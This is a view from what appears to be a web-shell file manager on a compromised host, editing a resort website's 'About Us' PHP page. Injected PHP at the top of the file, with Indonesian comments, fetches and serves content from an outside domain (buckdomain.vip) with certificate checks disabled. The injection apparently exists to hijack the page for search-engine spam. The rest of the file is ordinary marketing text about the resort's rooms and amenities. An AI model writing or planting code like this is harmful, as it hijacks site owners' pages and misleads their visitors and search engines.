File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/naturebreezeresort.com/about.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/ubm4d/www.naturebreezeresort.com-about.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>About Us | Nature Breeze Resort</title> <link rel="shortcut icon" href="assets/images/favicon.png" type="image/x-icon"> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" href="assets/css/aos.css"> <link rel="stylesheet" href="assets/css/all.min.css"> <link rel="stylesheet" href="assets/css/lightcase.css"> <link rel="stylesheet" href="assets/css/swiper-bundle.min.css"> <link rel="stylesheet" href="assets/css/flatpickr.min.css"> <!-- main css for template --> <link rel="stylesheet" href="assets/css/style.css"> </head> <body> <!-- ===============>> Preloader start here <<================= --> <div class="preloader"> <div class="loader"></div> </div> <!-- ===============>> Preloader end here <<================= --> <!-- ========== Header Section Starts Here========== --> <?php include 'include/header.php'?> <!-- ========== Header Section Ends Here========== --> <!-- ================> Page header start here <================== --> <section class="page-header bg--cover" style="background-image: url(assets/images/header/bg.jpg);"> <div class="container"> <div class="page-header__content text-center"> <h2>About Us</h2> <nav style="--bs-breadcrumb-divider: '/';" aria-label="breadcrumb"> <ol class="breadcrumb justify-content-center mb-0"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item active" aria-current="page">About Us</li> </ol> </nav> </div> </div> </section> <!-- ================> Page header end here <================== --> <!-- ========== About Section start Here========== --> <section class="about padding-top padding-bottom about--shape"> <div class="container"> <div class="about__wrapper"> <div class="row flex-lg-row-reverse align-items-center g-5"> <div class="col-lg-6"> <div class="about__content" data-aos="fade-up" data-aos-duration="1000"> <div class="common-header"> <p class="subtitle">Welcome to Nature Breeze Resort</p> <h2>About Nature Breeze Resort</h2> </div> <p>Nature Breeze Resort in Chinnakottakuppam, Vanur Taluk, Pondicherry, is a serene getaway surrounded by raw nature and lush farmland filled with lemon, jackfruit, mango, coconut, and more. Spread across a vast, fully compounded property, it is one of the largest resorts in Pondicherry, offering guests a peaceful escape while still being conveniently close to Puducherry Airport (just 5 km away) and Chennai International Airport. Designed to provide the perfect balance of comfort and nature, the resort ensures that every stay is filled with relaxation and rejuvenation.</p> <p>The resort offers a variety of accommodation options to suit different group sizes and preferences, including a luxurious 3-bedroom villa with a private swimming pool, 4 executive AC cottages, 4 classy AC cottages, and 8 studio AC rooms.</p> </div> </div> <div class="col-lg-6"> <div class="about__image" data-aos="fade-up-right" data-aos-duration="1000"> <img src="assets/images/about/abt-1.jpg" alt="About image"> </div> </div> <div class="col-lg-12"> <p> Guests can enjoy three swimming pools, including a kid-friendly pool and an indoor pool, with the villa offering an exclusive private pool. Families and groups will especially appreciate the kids’ play area, campfire setup, coal BBQ facilities, and both indoor and outdoor games like cricket, volleyball, shuttle, carrom, chess, and more. Complimentary amenities such as breakfast, WiFi, parking, lawn access, and recreational activities ensure a wholesome and value-packed experience.</p> <p> Nature Breeze Resort also features an in-house kitchen and restaurant, where meals can be enjoyed with pre-orders, adding a homely touch to the stay. With 24/7 security, a sprawling natural landscape, and ample space for relaxation, it creates an environment that feels safe, refreshing, and close to nature. Whether guests are looking for a quiet retreat, a fun family vacation, or a group getaway with outdoor activities, the resort delivers an experience that combines modern comforts with the charm of natural surroundings.</p> </div> </div> </div> </div> </section> <!-- ========== About Section ends Here========== --> <!-- ========== Feature Section Ends Here========== --> <!-- ========== Footer Section start Here========== --> <?php include 'include/footer.php'?> <!-- ========== Footer Section ends Here========== --> <!-- scrollToTop start here --> <a href="#" class="scrollToTop"><i class="fa-solid fa-arrow-up"></i></a> <!-- scrollToTop ending here --> <!-- vendor plugins --> <script src="assets/js/jquery-3.6.0.min.js"></script> <script src="assets/js/bootstrap.bundle.min.js"></script> <script src="assets/js/imagesloaded.pkgd.min.js"></script> <script src="assets/js/isotope.pkgd.min.js"></script> <script src="assets/js/flatpickr.js"></script> <script src="assets/js/all.min.js"></script> <script src="assets/js/swiper-bundle.min.js"></script> <script src="assets/js/aos.js"></script> <script src="assets/js/jquery.nice-select.min.js"></script> <script src="assets/js/countdown.min.js"></script> <script src="assets/js/lightcase.js"></script> <script src="assets/js/purecounter_vanilla.js"></script> <script src="assets/js/kursor.min.js"></script> <script src="assets/js/progressbar.min.js"></script> <script src="assets/js/custom.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings